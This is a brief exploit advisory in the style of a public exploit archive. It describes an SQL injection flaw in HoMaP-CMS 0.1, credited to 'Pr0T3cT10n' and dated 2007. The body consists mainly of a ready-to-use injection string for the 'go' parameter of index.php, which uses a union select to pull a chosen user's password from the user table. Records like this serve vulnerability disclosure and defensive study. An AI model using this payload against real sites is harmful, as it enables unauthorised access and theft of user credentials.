# Exploit Title: HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability # Date: 17/04/2007 # Author: Pr0T3cT10n # Software Link: SourceForge.net # Version: 0.1 # Tested on: 0.1 # CVE: # Code: -------------------------------------------------------------------------------------------------------------------------------- // HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability // Author: Pr0T3cT10n (ISRAEL) // Download: SourceForge.net // Version affected: 0.1 // Exploit: index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME] --------------------------------------------------------------------------------------------------------------------------------